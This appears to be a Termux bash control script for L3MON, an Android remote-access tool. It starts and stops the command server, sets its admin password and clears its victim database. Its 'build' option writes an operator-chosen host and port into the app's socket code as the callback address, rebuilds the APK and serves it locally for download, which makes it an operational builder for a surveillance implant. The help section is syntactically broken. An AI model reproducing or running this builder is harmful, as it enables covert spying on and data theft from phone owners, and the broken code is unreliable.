#!/bin/bash

#############################################################
# Colors
#############################################################
clear='\033[0m'
IRed='\033[0;91m'         # Red
IGreen='\033[0;92m'       # Green
IBlue='\033[0;94m'        # Blue
IPurple='\033[0;95m'      # Purple
ICyan='\033[0;96m'        # Cyan


#############################################################
# Start
#############################################################
if [ "$1" == "start" ]
then
	cd $PREFIX/share/L3MON/server
	pm2 start index.js -s
	printf "${IGreen}    [✔] 𝙇3𝙈𝙊𝙉 𝙎𝙩𝙖𝙧𝙩𝙚𝙙  \n" | pv -qL 30

#############################################################
# Stop
#############################################################
elif [ "$1" == "stop" ]
then
	cd $PREFIX/share/L3MON/server
	pm2 stop index.js -s
	printf "${IRed}    [✘] 𝙇3𝙈𝙊𝙉 𝙎𝙩𝙤𝙥𝙚𝙙\n" | pv -qL 30


#############################################################
# Restart
#############################################################
elif [ "$1" == "restart" ] 
then
	cd $PREFIX/share/L3MON/server
	pm2 restart index.js -s
	printf "${IPurple}    [✔] 𝗟𝟯𝗠𝗢𝗡 𝗥𝗲𝘀𝘁𝗮𝗿𝘁𝗲𝗱\n" | pv -qL 30

#############################################################
# Build
#############################################################
elif [ "$1" == "build" ]
then
	smaliFile="smali/com/etechd/l3mon/IOSocket.smali"
	if [ -d $PREFIX/share/L3MON ]; then
		appPath="$PREFIX/share/L3MON/server/app/factory/decompiled"
	fi
	printf "${ICyan}"
	read -p "    [✯] 𝗛𝗼𝘀𝘁 ➧ " host
	read -p "    [✯] 𝗣𝗼𝗿𝘁 ➧ " port
	sed -i "s#http.*#http://$host:$port?model=\"#" $appPath/$smaliFile
	apktool b "$appPath" -o $PREFIX/share/L3MON/app.apk > /dev/null 2>&1 
	zipalign -v 4 app.apk L3MON.apk > /dev/null 2>&1
	rm -rf app.apk
	printf "${IGreen}    [✔] 𝗔𝗽𝗸 𝗕𝘂𝗶𝗹𝗱 𝗦𝘂𝗰𝗰𝗲𝘀𝘀𝗳𝘂𝗹\n" | pv -qL 30
	cd $PREFIX/share/L3MON
	pkill php
	php -S localhost:8080 > /dev/null 2>&1 &
	sleep 2
	termux-open-url http://localhost:8080
	printf "${IGreen}\n"
	read -p "              𝙋𝙧𝙚𝙨𝙨 𝙀𝙣𝙩𝙚𝙧 𝙁𝙤𝙧 𝙎𝙩𝙤𝙥 " host
	pkill php
	rm -rf L3MON.apk




#############################################################
# Bind 
#############################################################

elif [ "$1" == "bind" ]
then
	printf "${ICyan} [★] 𝑨𝒅𝒅𝒆𝒅 𝑺𝒐𝒐𝒏 𝑻𝒉𝒊𝒔 𝑶𝒑𝒕𝒊𝒐𝒏 ${clear}\n" | pv -qL 30


#############################################################
# Clean
#############################################################
elif [ "$1" == "clean" ]
then

	rm -rf $PREFIX/share/L3MON/server/maindb.json 
	pm2 restart $PREFIX/share/L3MON/server/index.js -s
	printf " ${ICyan}   [✔] 𝐂𝐥𝐞𝐚𝐧  𝐒𝐮𝐜𝐜𝐞𝐬𝐬𝐟𝐮𝐥 \n" | pv -qL 30

#############################################################
# Help
#############################################################
elif [ "$1" == "-h" ]
then
	l="${ICyan}➧${clear}"
	o="${IGreen}"
	
	$bl $o lemon password\n
	$l $o lemon start\n
	$l $o lemon stop\n
	$l $o lemon restart\n
	$l $o lemon build\n
	$l $o lemon bind (Soon)\n
	$l $o lemon -h (help)\n
	$l $o lemon update\n
	$l $o lemon clean\n" | pv -qL 100



############################################################
# Password 
############################################################
elif [ "$1" == "password" ]
then
	pm2 restart $PREFIX/share/L3MON/server/index.js -s

	printf " ${ICyan}"
	read -p "   [✯] 𝙉𝙚𝙬 𝙋𝙖𝙨𝙨𝙬𝙤𝙧𝙙 ➧ " pas
	pass=$(echo -n $pas | md5sum | awk '{print $1}')
	sed -i "s#\"password\": \"\"#\"password\": \"$pass\"#g" $PREFIX/share/L3MON/server/maindb.json
	pm2 restart $PREFIX/share/L3MON/server/index.js -s
	printf " ${IGreen}   [✔] 𝙋𝙖𝙨𝙨𝙬𝙤𝙧𝙙 𝙎𝙖𝙫𝙚𝙙 \n" | pv -qL 30


###############################################################
# Update
###############################################################
elif [ "$1" == "update" ]
then
	cd
	printf " ${IGreen}   [☢] 𝙋𝙡𝙚𝙖𝙨𝙚 𝙒𝙖𝙞𝙩 𝙇3𝙈𝙊𝙉 𝙞𝙨 𝙐𝙥𝙙𝙖𝙩𝙞𝙣𝙜... \n" | pv -qL 30
	rm -rf $PREFIX/bin/lemon
	rm -rf $PREFIX/share/L3MON
	rm -rf L3MON-Termux > /dev/null 2>&1 
	git clone https://github.com/rootuserdj/L3MON-Termux.git > /dev/null 2>&1
	cd L3MON-Termux
	mv L3MON/lemon  $PREFIX/bin
	mv L3MON  $PREFIX/share
	chmod +x $PREFIX/bin/lemon
	rm -rf $HOME/L3MON-Termux
	printf " ${IGreen}   [✔] 𝙇3𝙈𝙊𝙉 𝙐𝙥𝙙𝙖𝙩𝙚𝙙 𝙎𝙞𝙘𝙚𝙨𝙨𝙛𝙪𝙡 \n" | pv -qL 30
	

###############################################################
# Else Part 
###############################################################
else
	printf "${IRed}    [-] 𝙀𝙧𝙧𝙤𝙧 𝙏𝙧𝙮 𝙖𝙜𝙖𝙞𝙣 𝙬𝙞𝙩𝙝 -𝙝\n" | pv -qL 30
fi

